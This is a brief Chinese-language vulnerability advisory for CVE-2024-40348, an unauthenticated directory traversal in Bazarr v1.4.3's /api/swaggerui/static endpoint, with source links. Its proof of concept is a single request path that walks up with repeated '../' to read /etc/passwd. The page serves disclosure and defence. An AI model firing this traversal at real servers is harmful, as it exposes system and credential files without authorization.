Bazarr任意文件读取(CVE-2024-40348)

2024-07-25 Bazarr PoC Public

Description

Bazaar v1.4.3 的组件 /api/swaggerui/static 中存在一个问题,允许未经身份验证的攻击者执行目录遍历。

PoC

# Bazarr任意文件读取(CVE-2024-40348)



Bazaar v1.4.3 的组件 /api/swaggerui/static 中存在一个问题,允许未经身份验证的攻击者执行目录遍历。



## poc



```yaml

/api/swaggerui/static/../../../../../../../../../../../../../../../../etc/passwd

```







## 漏洞来源



- https://www.seebug.org/vuldb/ssvid-99863

- https://github.com/4rdr/proofs/blob/main/info/Bazaar_1.4.3_File_Traversal_via_Filename.md

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

Related Vulnerabilities